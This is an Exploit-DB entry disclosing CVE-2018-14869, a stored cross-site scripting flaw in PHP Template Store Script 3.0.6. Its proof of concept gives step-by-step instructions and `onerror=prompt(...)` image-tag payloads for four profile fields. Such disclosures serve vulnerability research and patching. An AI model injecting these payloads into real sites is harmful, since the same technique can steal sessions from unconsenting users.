PHP Template Store Script 3.0.6 - Cross-Site Scripting

EDB-ID: 45143 Author: Sarafraz Khan Published: 2018-08-03
CVE: CVE-2018-14869 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Cross-Site Scripting (XSS)
E-DB Verified: Waiting verification Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
# Exploit Title:  PHP Template Store Script- 3.0.6 - Stored XSS via Addres ,Bank Name,and A/c Holder Name 
# Date: 02.08.2018
# Site Titel : Exclusive Scripts
# Vendor Homepage:
# Software Link:
# Category: Web Application
# Version: 3.0.6
# Exploit Author: Sarafraz Khan
# Contact:
# Web:
# Tested on: Windows 10 -Firefox
# CVE-2018-14869
Proof of Concept:-
1. Go  to the  site ( ) .
2- Click on => Login => Register => and then fill the Form and click on Register Now
3-Goto your mail and Verify it.
4-Now come back to site and Sign in  using your  Verified mail and Password.
5-Goto Setting => Personal information  and paste these code in 
    Address line 1 =>         "><img src=x onerror=prompt(/SARAFRAZ/)>
    Address Line 2 =>        "><img src=x onerror=prompt(/KHAN/)>
     Bank name  =>            "><img src=x onerror=prompt(/KING/)>
    A/C Holder name =>     "><img src=x onerror=prompt(/GOOGLEQUEENS/)>

  and then click on Update Profile.

6-Now You will having popup of /SARAFRAZ/  ,  /KHAN/ , / KING/ and /GOOGLEQUEENS/  in you account..


Related Exploits

Trying to match CVEs (1): CVE-2018-14869
Other Possible E-DB Search Terms: PHP Template Store Script 3.0.6,  PHP Template Store Script
Date D V Title Author
No matches